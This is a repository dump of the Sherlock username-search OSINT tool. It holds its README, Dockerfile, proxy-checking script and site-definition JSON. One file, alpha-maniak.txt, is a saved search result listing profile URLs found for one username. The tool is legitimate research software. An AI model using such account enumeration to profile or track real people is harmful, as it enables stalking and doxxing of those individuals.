instances of unacceptable behavior. 39 | 40 | Project maintainers have the right and responsibility to remove, edit, or 41 | reject comments, commits, code, wiki edits, issues, and other contributions 42 | that are not aligned to this Code of Conduct, or to ban temporarily or 43 | permanently any contributor for other behaviors that they deem inappropriate, 44 | threatening, offensive, or harmful. 45 | 46 | ## Scope 47 | 48 | This Code of Conduct applies both within project spaces and in public spaces 49 | when an individual is representing the project or its community. Examples of 50 | representing a project or community include using an official project e-mail 51 | address, posting via an official social media account, or acting as an appointed 52 | representative at an online or offline event. Representation of a project may be 53 | further defined and clarified by project maintainers. 54 | 55 | ## Enforcement 56 | 57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 58 | reported by contacting the project team at yahya.arbabi@gmail.com. All 59 | complaints will be reviewed and investigated and will result in a response that 60 | is deemed necessary and appropriate to the circumstances. The project team is 61 | obligated to maintain confidentiality with regard to the reporter of an incident. 62 | Further details of specific enforcement policies may be posted separately. 63 | 64 | Project maintainers who do not follow or enforce the Code of Conduct in good 65 | faith may face temporary or permanent repercussions as determined by other 66 | members of the project's leadership. 
67 | 68 | ## Attribution 69 | 70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, 71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html 72 | 73 | [homepage]: https://www.contributor-covenant.org 74 | 75 | For answers to common questions about this code of conduct, see 76 | https://www.contributor-covenant.org/faq 77 | -------------------------------------------------------------------------------- /sherlock/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # How To Contribute To Sherlock 2 | First off, thank you for the help! 3 | 4 | There are many ways to contribute. Here is some high level grouping. 5 | 6 | ## Adding New Sites 7 | 8 | Please look at the Wiki entry on 9 | [adding new sites](https://github.com/sherlock-project/sherlock/wiki/Adding-Sites-To-Sherlock) 10 | to understand the issues. 11 | 12 | Any new sites that are added need to have a username that has been claimed, and one 13 | that is unclaimed documented in the site data. This allows the regression tests 14 | to ensure that everything is working. 15 | 16 | It is required that a contributor test any new sites by either running the full tests, or running 17 | a site-specific query against the claimed and unclaimed usernames. 18 | 19 | It is not required that a contributor run the 20 | [site_list.py](https://github.com/sherlock-project/sherlock/blob/master/site_list.py) 21 | script. 22 | 23 | If there are performance problems with a site (e.g. slow to respond, unreliable uptime, ...), then 24 | the site may be removed from the list. The 25 | [removed_sites.md](https://github.com/sherlock-project/sherlock/blob/master/removed_sites.md) 26 | file contains sites that were included at one time in Sherlock, but had to be removed for 27 | one reason or another. 28 | 29 | In regards to adult sites (e.g. PornHub), we have agreed to not include them in Sherlock.
30 | However, we do understand that some users desire this support. The data.json file is easy to add to, 31 | so users will be able to maintain their own forks to have this support. This is not ideal. 32 | Maybe there could be another repo with an adult data.json? That would avoid forks getting out of date. 33 | 34 | ## Adding New Functionality 35 | 36 | Please ensure that the content on your branch passes all tests before submitting a pull request. 37 | -------------------------------------------------------------------------------- /sherlock/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.7-alpine as build 2 | WORKDIR /wheels 3 | RUN apk add --no-cache \ 4 | g++ \ 5 | gcc \ 6 | git \ 7 | libxml2 \ 8 | libxml2-dev \ 9 | libxslt-dev \ 10 | linux-headers 11 | COPY requirements.txt /opt/sherlock/ 12 | RUN pip3 wheel -r /opt/sherlock/requirements.txt 13 | 14 | 15 | FROM python:3.7-alpine 16 | WORKDIR /opt/sherlock 17 | ARG VCS_REF 18 | ARG VCS_URL="https://github.com/sherlock-project/sherlock" 19 | LABEL org.label-schema.vcs-ref=$VCS_REF \ 20 | org.label-schema.vcs-url=$VCS_URL 21 | COPY --from=build /wheels /wheels 22 | COPY . 
/opt/sherlock/ 23 | RUN pip3 install -r requirements.txt -f /wheels \ 24 | && rm -rf /wheels \ 25 | && rm -rf /root/.cache/pip/* 26 | 27 | ENTRYPOINT ["python", "sherlock.py"] 28 | -------------------------------------------------------------------------------- /sherlock/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Sherlock Project 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /sherlock/README.md: -------------------------------------------------------------------------------- 1 |

2 | 3 | 4 | 5 |
6 | Hunt down social media accounts by username across social networks 7 |
8 | 9 | 10 | 11 | 12 | Website 13 | docker image 14 |

15 | 16 |

17 | Demo 18 |    |    19 | Installation 20 |    |    21 | Usage 22 |    |    23 | Docker Notes 24 |    |    25 | Adding New Sites 26 |

27 | 28 |

29 | 30 | 31 | 32 |

33 | 34 | 35 | 36 | 37 | ## Demo 38 | 39 | Use this link to test Sherlock directly in your browser: 40 | https://elody.com/scenario/plan/16/ 41 | 42 | ## Installation 43 | 44 | **NOTE**: Python 3.6 or higher is required. 45 | 46 | ```bash 47 | # clone the repo 48 | $ git clone https://github.com/sherlock-project/sherlock.git 49 | 50 | # change the working directory to sherlock 51 | $ cd sherlock 52 | 53 | # install python3 and python3-pip if they are not installed 54 | 55 | # install the requirements 56 | $ python3 -m pip install -r requirements.txt 57 | ``` 58 | [![Open in Cloud Shell](https://gstatic.com/cloudssh/images/open-btn.png)](https://console.cloud.google.com/cloudshell/open?git_repo=https://github.com/sherlock-project/sherlock&tutorial=README.md) 59 | 60 | ## Usage 61 | 62 | ```bash 63 | $ python3 sherlock.py --help 64 | usage: sherlock.py [-h] [--version] [--verbose] [--rank] 65 | [--folderoutput FOLDEROUTPUT] [--output OUTPUT] [--tor] 66 | [--unique-tor] [--csv] [--site SITE_NAME] 67 | [--proxy PROXY_URL] [--json JSON_FILE] 68 | [--proxy_list PROXY_LIST] [--check_proxies CHECK_PROXY] 69 | [--timeout TIMEOUT] [--print-found] 70 | USERNAMES [USERNAMES ...] 71 | 72 | Sherlock: Find Usernames Across Social Networks (Version 0.10.7) 73 | 74 | positional arguments: 75 | USERNAMES One or more usernames to check with social networks. 76 | 77 | optional arguments: 78 | -h, --help show this help message and exit 79 | --version Display version information and dependencies. 80 | --verbose, -v, -d, --debug 81 | Display extra debugging information and metrics. 82 | --rank, -r Present websites ordered by their Alexa.com global 83 | rank in popularity. 84 | --folderoutput FOLDEROUTPUT, -fo FOLDEROUTPUT 85 | If using multiple usernames, the output of the results 86 | will be saved to this folder. 87 | --output OUTPUT, -o OUTPUT 88 | If using single username, the output of the result 89 | will be saved to this file. 
90 | --tor, -t Make requests over Tor; increases runtime; requires 91 | Tor to be installed and in system path. 92 | --unique-tor, -u Make requests over Tor with new Tor circuit after each 93 | request; increases runtime; requires Tor to be 94 | installed and in system path. 95 | --csv Create Comma-Separated Values (CSV) File. 96 | --site SITE_NAME Limit analysis to just the listed sites. Add multiple 97 | options to specify more than one site. 98 | --proxy PROXY_URL, -p PROXY_URL 99 | Make requests over a proxy. e.g. 100 | socks5://127.0.0.1:1080 101 | --json JSON_FILE, -j JSON_FILE 102 | Load data from a JSON file or an online, valid, JSON 103 | file. 104 | --proxy_list PROXY_LIST, -pl PROXY_LIST 105 | Make requests over a proxy randomly chosen from a list 106 | generated from a .csv file. 107 | --check_proxies CHECK_PROXY, -cp CHECK_PROXY 108 | To be used with the '--proxy_list' parameter. The 109 | script will check if the proxies supplied in the .csv 110 | file are working and anonymous.Put 0 for no limit on 111 | successfully checked proxies, or another number to 112 | institute a limit. 113 | --timeout TIMEOUT Time (in seconds) to wait for response to requests. 114 | Default timeout of 60.0s.A longer timeout will be more 115 | likely to get results from slow sites.On the other 116 | hand, this may cause a long delay to gather all 117 | results. 118 | --print-found Do not output sites where the username was not found. 119 | --no-color Don't color terminal output 120 | --browse, -b Browse to all results on default bowser. 121 | ``` 122 | 123 | To search for only one user: 124 | ``` 125 | python3 sherlock.py user123 126 | ``` 127 | 128 | To search for more than one user: 129 | ``` 130 | python3 sherlock.py user1 user2 user3 131 | ``` 132 | 133 | Accounts found will be stored in an individual text file with the corresponding username (e.g ```user123.txt```). 
134 | 135 | ## Anaconda (Windows) Notes 136 | If you are using Anaconda in Windows, using 'python3' might not work. Use 'python' instead. 137 | 138 | ## Docker Notes 139 | If docker is installed you can build an image and run this as a container. 140 | 141 | ``` 142 | docker build -t mysherlock-image . 143 | ``` 144 | 145 | Once the image is built, sherlock can be invoked by running the following: 146 | 147 | ``` 148 | docker run --rm -t mysherlock-image user123 149 | ``` 150 | 151 | The optional ```--rm``` flag removes the container filesystem on completion to prevent cruft build-up. See: https://docs.docker.com/engine/reference/run/#clean-up---rm 152 | 153 | The optional ```-t``` flag allocates a pseudo-TTY which allows colored output. See: https://docs.docker.com/engine/reference/run/#foreground 154 | 155 | Use the following command to access the saved results: 156 | 157 | ``` 158 | docker run --rm -t -v "$PWD/results:/opt/sherlock/results" mysherlock-image -o /opt/sherlock/results/text.txt user123 159 | ``` 160 | 161 | The ```-v "$PWD/results:/opt/sherlock/results"``` option tells docker to create (or use) the folder `results` in the 162 | present working directory and to mount it at `/opt/sherlock/results` on the docker container. 163 | The `-o /opt/sherlock/results/text.txt` option tells `sherlock` to output the result. 164 | 165 | Or you can use "Docker Hub" to run `sherlock`: 166 | ``` 167 | docker run theyahya/sherlock user123 168 | ``` 169 | 170 | ### Using `docker-compose` 171 | 172 | You can use the `docker-compose.yml` file from the repository and use this command: 173 | 174 | ``` 175 | docker-compose run sherlock -o /opt/sherlock/results/text.txt user123 176 | ``` 177 | 178 | ## Adding New Sites 179 | 180 | Please look at the Wiki entry on 181 | [adding new sites](https://github.com/TheYahya/sherlock/wiki/Adding-Sites-To-Sherlock) 182 | to understand the issues. 183 | 184 | **NOTE**: Sherlock is not accepting adult sites in the standard list. 
185 | 186 | ## Tests 187 | Thank you for contributing to Sherlock! 188 | 189 | Before creating a pull request with new development, please run the tests 190 | to ensure that everything is working great. It would also be a good idea to run the tests 191 | before starting development to distinguish problems between your 192 | environment and the Sherlock software. 193 | 194 | The following is an example of the command line to run all the tests for 195 | Sherlock. This invocation hides the progress text that Sherlock normally 196 | outputs, and instead shows the verbose output of the tests. 197 | 198 | ``` 199 | $ python3 -m unittest tests.all --buffer --verbose 200 | ``` 201 | 202 | Note that we do currently have 100% test coverage. Unfortunately, some of 203 | the sites that Sherlock checks are not always reliable, so it is common 204 | to get response errors. 205 | 206 | If some sites are failing due to connection problems (site is down, in maintenance, etc) 207 | you can exclude them from tests by creating a `tests/.excluded_sites` file with a 208 | list of sites to ignore (one site name per line). 209 | 210 | ## Stargazers over time 211 | 212 | [![Stargazers over time](https://starcharts.herokuapp.com/TheYahya/sherlock.svg)](https://starcharts.herokuapp.com/TheYahya/sherlock) 213 | 214 | ## License 215 | 216 | MIT © Sherlock Project
217 | Original Creator - [Siddharth Dushantha](https://github.com/sdushantha) 218 | -------------------------------------------------------------------------------- /sherlock/__pycache__/load_proxies.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Scar26/CTF-tools/4c88fe9133159751d610f88051ce27a946bc07d6/sherlock/__pycache__/load_proxies.cpython-37.pyc -------------------------------------------------------------------------------- /sherlock/alpha-maniak.txt: -------------------------------------------------------------------------------- 1 | https://cash.me/$alpha-maniak 2 | https://fortnitetracker.com/profile/all/alpha-maniak 3 | https://www.gpsies.com/mapUser.do?username=alpha-maniak 4 | http://alpha-maniak.insanejournal.com/profile 5 | https://yandex.ru/collections/user/alpha-maniak/ 6 | https://bbs.boingboing.net/u/alpha-maniak 7 | https://elwo.ru/index/8-0-alpha-maniak 8 | https://www.opennet.ru/~alpha-maniak 9 | http://pedsovet.su/index/8-0-alpha-maniak 10 | https://radioskot.ru/index/8-0-alpha-maniak 11 | Total Websites Username Detected On : 10 -------------------------------------------------------------------------------- /sherlock/data_bad_site.json: -------------------------------------------------------------------------------- 1 | { 2 | "AngelList": { 3 | "errorType": "status_code", 4 | "rank": 5767, 5 | "url": "https://angel.co/{}", 6 | "urlMain": "https://angel.co/", 7 | "username_claimed": "blue", 8 | "username_unclaimed": "noonewouldeverusethis7" 9 | }, 10 | "Basecamp": { 11 | "errorMsg": "The account you were looking for doesn't exist", 12 | "errorType": "message", 13 | "rank": 4914, 14 | "url": "https://{}.basecamphq.com", 15 | "urlMain": "https://basecamp.com/", 16 | "username_claimed": "blue", 17 | "username_unclaimed": "noonewouldeverusethis7" 18 | }, 19 | "BlackPlanet": { 20 | "errorMsg": "My Hits", 21 | "errorType": "message", 22 | "rank": 110021, 23 | 
"url": "http://blackplanet.com/{}", 24 | "urlMain": "http://blackplanet.com/" 25 | }, 26 | "CapFriendly": { 27 | "errorMsg": "No User Found", 28 | "errorType": "message", 29 | "rank": 64100, 30 | "url": "https://www.capfriendly.com/users/{}", 31 | "urlMain": "https://www.capfriendly.com/", 32 | "username_claimed": "blue", 33 | "username_unclaimed": "noonewouldeverusethis" 34 | }, 35 | "Canva": { 36 | "errorType": "response_url", 37 | "errorUrl": "https://www.canva.com/{}", 38 | "rank": 128, 39 | "url": "https://www.canva.com/{}", 40 | "urlMain": "https://www.canva.com/", 41 | "username_claimed": "jenny", 42 | "username_unclaimed": "xgtrq" 43 | }, 44 | "Codementor": { 45 | "errorType": "status_code", 46 | "rank": 10252, 47 | "url": "https://www.codementor.io/@{}", 48 | "urlMain": "https://www.codementor.io/", 49 | "username_claimed": "blue", 50 | "username_unclaimed": "noonewouldeverusethis7" 51 | }, 52 | "Codepen": { 53 | "errorType": "status_code", 54 | "rank": 1359, 55 | "url": "https://codepen.io/{}", 56 | "urlMain": "https://codepen.io/", 57 | "username_claimed": "blue", 58 | "username_unclaimed": "noonewouldeverusethis7" 59 | }, 60 | "EVE Online": { 61 | "errorType": "response_url", 62 | "errorUrl": "https://eveonline.com", 63 | "rank": 15347, 64 | "url": "https://evewho.com/pilot/{}/", 65 | "urlMain": "https://eveonline.com", 66 | "username_claimed": "blue", 67 | "username_unclaimed": "noonewouldeverusethis7" 68 | }, 69 | "fanpop": { 70 | "errorType": "response_url", 71 | "errorUrl": "http://www.fanpop.com/", 72 | "rank": 9454, 73 | "url": "http://www.fanpop.com/fans/{}", 74 | "urlMain": "http://www.fanpop.com/", 75 | "username_claimed": "blue", 76 | "username_unclaimed": "noonewould_everusethis7" 77 | }, 78 | "Fotolog": { 79 | "errorType": "status_code", 80 | "rank": 47777, 81 | "url": "https://fotolog.com/{}", 82 | "urlMain": "https://fotolog.com/" 83 | }, 84 | "Foursquare": { 85 | "errorType": "status_code", 86 | "rank": 1843, 87 | "url": 
"https://foursquare.com/{}", 88 | "urlMain": "https://foursquare.com/", 89 | "username_claimed": "dens", 90 | "username_unclaimed": "noonewouldeverusethis7" 91 | }, 92 | "furaffinity": { 93 | "errorMsg": "user cannot be found", 94 | "errorType": "message", 95 | "rank": 0, 96 | "url": "https://www.furaffinity.net/user/{}", 97 | "urlMain": "https://www.furaffinity.net", 98 | "username_claimed": "blue", 99 | "username_unclaimed": "noonewouldeverusethis777777" 100 | }, 101 | "Imgur": { 102 | "errorType": "status_code", 103 | "rank": 74, 104 | "url": "https://imgur.com/user/{}", 105 | "urlMain": "https://imgur.com/", 106 | "username_claimed": "blue", 107 | "username_unclaimed": "noonewouldeverusethis7" 108 | }, 109 | "Khan Academy": { 110 | "errorType": "status_code", 111 | "rank": 377, 112 | "url": "https://www.khanacademy.org/profile/{}", 113 | "urlMain": "https://www.khanacademy.org/", 114 | "username_claimed": "blue", 115 | "username_unclaimed": "noonewouldeverusethis7" 116 | }, 117 | "KiwiFarms": { 118 | "errorMsg": "The specified member cannot be found", 119 | "errorType": "message", 120 | "rank": 38737, 121 | "url": "https://kiwifarms.net/members/?username={}", 122 | "urlMain": "https://kiwifarms.net/", 123 | "username_claimed": "blue", 124 | "username_unclaimed": "noonewouldeverusethis" 125 | }, 126 | "linkedin.com": { 127 | "errorMsg": "This profile is not available", 128 | "errorType": "message", 129 | "rank": 0, 130 | "url": "https://www.linkedin.com/in/{}", 131 | "urlMain": "https://www.linkedin.com/", 132 | "username_claimed": "alex", 133 | "username_unclaimed": "noonewouldeverusethis7" 134 | }, 135 | "PayPal": { 136 | "errorType": "response_url", 137 | "errorUrl": "https://www.paypal.com/paypalme2/404", 138 | "rank": 18441, 139 | "url": "https://www.paypal.com/paypalme2/{}", 140 | "urlMain": "https://www.paypal.me/", 141 | "username_claimed": "blue", 142 | "username_unclaimed": "noneownsthisusername" 143 | }, 144 | "Pexels": { 145 | "errorType": 
"status_code", 146 | "rank": 745, 147 | "url": "https://www.pexels.com/@{}", 148 | "urlMain": "https://www.pexels.com/", 149 | "username_claimed": "bruno", 150 | "username_unclaimed": "noonewouldeverusethis7" 151 | }, 152 | "Pixabay": { 153 | "errorType": "status_code", 154 | "rank": 378, 155 | "url": "https://pixabay.com/en/users/{}", 156 | "urlMain": "https://pixabay.com/", 157 | "username_claimed": "blue", 158 | "username_unclaimed": "noonewouldeverusethis7" 159 | }, 160 | "PowerShell Gallery": { 161 | "errorType": "status_code", 162 | "rank": 163562, 163 | "url": "https://www.powershellgallery.com/profiles/{}", 164 | "urlMain": "https://www.powershellgallery.com", 165 | "username_claimed": "powershellteam", 166 | "username_unclaimed": "noonewouldeverusethis7" 167 | }, 168 | "RamblerDating": { 169 | "errorType": "response_url", 170 | "errorUrl": "https://dating.rambler.ru/page/{}", 171 | "rank": 322, 172 | "url": "https://dating.rambler.ru/page/{}", 173 | "urlMain": "https://dating.rambler.ru/", 174 | "username_claimed": "blue", 175 | "username_unclaimed": "noonewouldeverusethis7" 176 | }, 177 | "Shockwave": { 178 | "errorMsg": "Oh no! 
You just finished all of the games on the internet!", 179 | "errorType": "message", 180 | "rank": 35916, 181 | "url": "http://www.shockwave.com/member/profiles/{}.jsp", 182 | "urlMain": "http://www.shockwave.com/", 183 | "username_claimed": "blue", 184 | "username_unclaimed": "noonewouldeverusethis" 185 | }, 186 | "StreamMe": { 187 | "errorType": "status_code", 188 | "rank": 31702, 189 | "url": "https://www.stream.me/{}", 190 | "urlMain": "https://www.stream.me/", 191 | "username_claimed": "blue", 192 | "username_unclaimed": "noonewouldeverusethis7" 193 | }, 194 | "Teknik": { 195 | "errorMsg": "The user does not exist", 196 | "errorType": "message", 197 | "rank": 357163, 198 | "url": "https://user.teknik.io/{}", 199 | "urlMain": "https://teknik.io/", 200 | "username_claimed": "red", 201 | "username_unclaimed": "noonewouldeverusethis7" 202 | }, 203 | "YandexMarket": { 204 | "errorMsg": "\u0422\u0443\u0442 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435\u0442", 205 | "errorType": "message", 206 | "rank": 47, 207 | "url": "https://market.yandex.ru/user/{}/achievements", 208 | "urlMain": "https://market.yandex.ru/", 209 | "username_claimed": "blue", 210 | "username_unclaimed": "noonewouldeverusethis7" 211 | }, 212 | "Insanejournal": { 213 | "errorMsg": "Unknown user", 214 | "errorType": "message", 215 | "rank": 29728, 216 | "url": "http://{}.insanejournal.com/profile", 217 | "urlMain": "insanejournal.com", 218 | "username_claimed": "blue", 219 | "username_unclaimed": "dlyr6cd" 220 | } 221 | } 222 | 223 | -------------------------------------------------------------------------------- /sherlock/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | 3 | services: 4 | sherlock: 5 | build: . 
6 | image: theyahya/sherlock 7 | volumes: 8 | - "./results:/opt/sherlock/results" 9 | -------------------------------------------------------------------------------- /sherlock/images/preview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Scar26/CTF-tools/4c88fe9133159751d610f88051ce27a946bc07d6/sherlock/images/preview.png -------------------------------------------------------------------------------- /sherlock/images/sherlock_preview.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Scar26/CTF-tools/4c88fe9133159751d610f88051ce27a946bc07d6/sherlock/images/sherlock_preview.gif -------------------------------------------------------------------------------- /sherlock/load_proxies.py: -------------------------------------------------------------------------------- 1 | import csv 2 | import requests 3 | import time 4 | from collections import namedtuple 5 | from colorama import Fore, Style 6 | 7 | 8 | def load_proxies_from_csv(path_to_list): 9 | """ 10 | A function which loads proxies from a .csv file, to a list. 11 | 12 | Inputs: path to .csv file which contains proxies, described by fields: 'ip', 'port', 'protocol'. 13 | 14 | Outputs: list containing proxies stored in named tuples. 15 | """ 16 | Proxy = namedtuple('Proxy', ['ip', 'port', 'protocol']) 17 | 18 | with open(path_to_list, 'r') as csv_file: 19 | csv_reader = csv.DictReader(csv_file) 20 | proxies = [Proxy(line['ip'],line['port'],line['protocol']) for line in csv_reader] 21 | 22 | return proxies 23 | 24 | 25 | def check_proxy(proxy_ip, proxy_port, protocol): 26 | """ 27 | A function which test the proxy by attempting 28 | to make a request to the designated website. 29 | 30 | We use 'wikipedia.org' as a test, since we can test the proxy anonymity 31 | by check if the returning 'X-Client-IP' header matches the proxy ip. 
32 | """ 33 | full_proxy = f'{protocol}://{proxy_ip}:{proxy_port}' 34 | proxies = {'http': full_proxy, 'https': full_proxy} 35 | try: 36 | r = requests.get('https://www.wikipedia.org',proxies=proxies, timeout=4) 37 | return_proxy = r.headers['X-Client-IP'] 38 | if proxy_ip==return_proxy: 39 | return True 40 | else: 41 | return False 42 | except Exception: 43 | return False 44 | 45 | 46 | def check_proxy_list(proxy_list, max_proxies=None): 47 | """ 48 | A function which takes in one mandatory argument -> a proxy list in 49 | the format returned by the function 'load_proxies_from_csv'. 50 | 51 | It also takes an optional argument 'max_proxies', if the user wishes to 52 | cap the number of validated proxies. 53 | 54 | Each proxy is tested by the check_proxy function. Since each test is done on 55 | 'wikipedia.org', in order to be considerate to Wikipedia servers, we are not using any async modules, 56 | but are sending successive requests each separated by at least 1 sec. 57 | 58 | Outputs: list containing proxies stored in named tuples. 59 | """ 60 | print((Style.BRIGHT + Fore.GREEN + "[" + 61 | Fore.YELLOW + "*" + 62 | Fore.GREEN + "] Started checking proxies.")) 63 | working_proxies = [] 64 | 65 | # If the user has limited the number of proxies we need, 66 | # the function will stop when the working_proxies 67 | # loads the max number of requested proxies. 
68 | if max_proxies != None: 69 | for proxy in proxy_list: 70 | if len(working_proxies) < max_proxies: 71 | time.sleep(1) 72 | if check_proxy(proxy.ip,proxy.port,proxy.protocol) == True: 73 | working_proxies.append(proxy) 74 | else: 75 | break 76 | else: 77 | for proxy in proxy_list: 78 | time.sleep(1) 79 | if check_proxy(proxy.ip,proxy.port,proxy.protocol) == True: 80 | working_proxies.append(proxy) 81 | 82 | if len(working_proxies) > 0: 83 | print((Style.BRIGHT + Fore.GREEN + "[" + 84 | Fore.YELLOW + "*" + 85 | Fore.GREEN + "] Finished checking proxies.")) 86 | return working_proxies 87 | 88 | else: 89 | raise Exception("Found no working proxies.") 90 | -------------------------------------------------------------------------------- /sherlock/removed_sites.md: -------------------------------------------------------------------------------- 1 | # List Of Sites Removed From Sherlock 2 | 3 | This is a list of sites implemented in such a way that the current design of 4 | Sherlock is not capable of determining if a given username exists or not. 5 | They are listed here in the hope that things may change in the future 6 | so they may be re-included. 7 | 8 | 9 | ## Basecamp 10 | 11 | As of 2020-02-23, all usernames are reported as not existing. 12 | 13 | Why was this ever added? It does not look like a social network. 14 | 15 | ``` 16 | "Basecamp": { 17 | "errorMsg": "The account you were looking for doesn't exist", 18 | "errorType": "message", 19 | "rank": 4914, 20 | "url": "https://{}.basecamphq.com", 21 | "urlMain": "https://basecamp.com/", 22 | "username_claimed": "blue", 23 | "username_unclaimed": "noonewouldeverusethis7" 24 | }, 25 | ``` 26 | 27 | ## Fanpop 28 | 29 | As of 2020-02-23, all usernames are reported as not existing. 
30 | 31 | ``` 32 | "fanpop": { 33 | "errorType": "response_url", 34 | "errorUrl": "http://www.fanpop.com/", 35 | "rank": 9454, 36 | "url": "http://www.fanpop.com/fans/{}", 37 | "urlMain": "http://www.fanpop.com/", 38 | "username_claimed": "blue", 39 | "username_unclaimed": "noonewould_everusethis7" 40 | }, 41 | ``` 42 | 43 | ## Canva 44 | 45 | As of 2020-02-23, all usernames are reported as not existing. 46 | 47 | ``` 48 | "Canva": { 49 | "errorType": "response_url", 50 | "errorUrl": "https://www.canva.com/{}", 51 | "rank": 128, 52 | "url": "https://www.canva.com/{}", 53 | "urlMain": "https://www.canva.com/", 54 | "username_claimed": "jenny", 55 | "username_unclaimed": "xgtrq" 56 | }, 57 | ``` 58 | 59 | ## Pixabay 60 | 61 | As of 2020-01-21, all usernames are reported as not existing. 62 | 63 | ``` 64 | "Pixabay": { 65 | "errorType": "status_code", 66 | "rank": 378, 67 | "url": "https://pixabay.com/en/users/{}", 68 | "urlMain": "https://pixabay.com/", 69 | "username_claimed": "blue", 70 | "username_unclaimed": "noonewouldeverusethis7" 71 | }, 72 | ``` 73 | 74 | ## Pexels 75 | 76 | As of 2020-01-21, all usernames are reported as not existing. 77 | 78 | ``` 79 | "Pexels": { 80 | "errorType": "status_code", 81 | "rank": 745, 82 | "url": "https://www.pexels.com/@{}", 83 | "urlMain": "https://www.pexels.com/", 84 | "username_claimed": "bruno", 85 | "username_unclaimed": "noonewouldeverusethis7" 86 | }, 87 | ``` 88 | 89 | ## RamblerDating 90 | 91 | As of 2019-12-31, site always times out. 92 | 93 | ``` 94 | "RamblerDating": { 95 | "errorType": "response_url", 96 | "errorUrl": "https://dating.rambler.ru/page/{}", 97 | "rank": 322, 98 | "url": "https://dating.rambler.ru/page/{}", 99 | "urlMain": "https://dating.rambler.ru/", 100 | "username_claimed": "blue", 101 | "username_unclaimed": "noonewouldeverusethis7" 102 | }, 103 | ``` 104 | 105 | ## YandexMarket 106 | 107 | As of 2019-12-31, all usernames are reported as existing. 
108 | 109 | ``` 110 | "YandexMarket": { 111 | "errorMsg": "\u0422\u0443\u0442 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435\u0442", 112 | "errorType": "message", 113 | "rank": 47, 114 | "url": "https://market.yandex.ru/user/{}/achievements", 115 | "urlMain": "https://market.yandex.ru/", 116 | "username_claimed": "blue", 117 | "username_unclaimed": "noonewouldeverusethis7" 118 | }, 119 | ``` 120 | 121 | ## Codementor 122 | 123 | As of 2019-12-31, usernames that exist are not detected. 124 | 125 | ``` 126 | "Codementor": { 127 | "errorType": "status_code", 128 | "rank": 10252, 129 | "url": "https://www.codementor.io/@{}", 130 | "urlMain": "https://www.codementor.io/", 131 | "username_claimed": "blue", 132 | "username_unclaimed": "noonewouldeverusethis7" 133 | }, 134 | ``` 135 | 136 | ## KiwiFarms 137 | 138 | As of 2019-12-31, the site gives a 403 for all usernames. You have to 139 | be logged into see a profile. 140 | 141 | ``` 142 | "KiwiFarms": { 143 | "errorMsg": "The specified member cannot be found", 144 | "errorType": "message", 145 | "rank": 38737, 146 | "url": "https://kiwifarms.net/members/?username={}", 147 | "urlMain": "https://kiwifarms.net/", 148 | "username_claimed": "blue", 149 | "username_unclaimed": "noonewouldeverusethis" 150 | }, 151 | ``` 152 | 153 | ## Teknik 154 | 155 | As of 2019-11-30, the site causes Sherlock to just hang. 156 | 157 | ``` 158 | "Teknik": { 159 | "errorMsg": "The user does not exist", 160 | "errorType": "message", 161 | "rank": 357163, 162 | "url": "https://user.teknik.io/{}", 163 | "urlMain": "https://teknik.io/", 164 | "username_claimed": "red", 165 | "username_unclaimed": "noonewouldeverusethis7" 166 | } 167 | ``` 168 | 169 | ## Shockwave 170 | 171 | As of 2019-11-28, usernames that exist give a 503 "Service Unavailable" 172 | HTTP Status. 173 | 174 | ``` 175 | "Shockwave": { 176 | "errorMsg": "Oh no! 
You just finished all of the games on the internet!", 177 | "errorType": "message", 178 | "rank": 35916, 179 | "url": "http://www.shockwave.com/member/profiles/{}.jsp", 180 | "urlMain": "http://www.shockwave.com/", 181 | "username_claimed": "blue", 182 | "username_unclaimed": "noonewouldeverusethis" 183 | }, 184 | ``` 185 | 186 | ## Foursquare 187 | 188 | Usernames that exist are not detected. 189 | 190 | ``` 191 | "Foursquare": { 192 | "errorType": "status_code", 193 | "rank": 1843, 194 | "url": "https://foursquare.com/{}", 195 | "urlMain": "https://foursquare.com/", 196 | "username_claimed": "dens", 197 | "username_unclaimed": "noonewouldeverusethis7" 198 | }, 199 | ``` 200 | 201 | ## Khan Academy 202 | 203 | Usernames that don't exist are detected. First noticed 2019-10-25. 204 | 205 | ``` 206 | "Khan Academy": { 207 | "errorType": "status_code", 208 | "rank": 377, 209 | "url": "https://www.khanacademy.org/profile/{}", 210 | "urlMain": "https://www.khanacademy.org/", 211 | "username_claimed": "blue", 212 | "username_unclaimed": "noonewouldeverusethis7" 213 | }, 214 | ``` 215 | 216 | ## PayPal 217 | 218 | Usernames that don't exist are detected. 219 | 220 | ``` 221 | "PayPal": { 222 | "errorType": "response_url", 223 | "errorUrl": "https://www.paypal.com/paypalme2/404", 224 | "rank": 18441, 225 | "url": "https://www.paypal.com/paypalme2/{}", 226 | "urlMain": "https://www.paypal.me/", 227 | "username_claimed": "blue", 228 | "username_unclaimed": "noneownsthisusername" 229 | }, 230 | ``` 231 | 232 | ## EVE 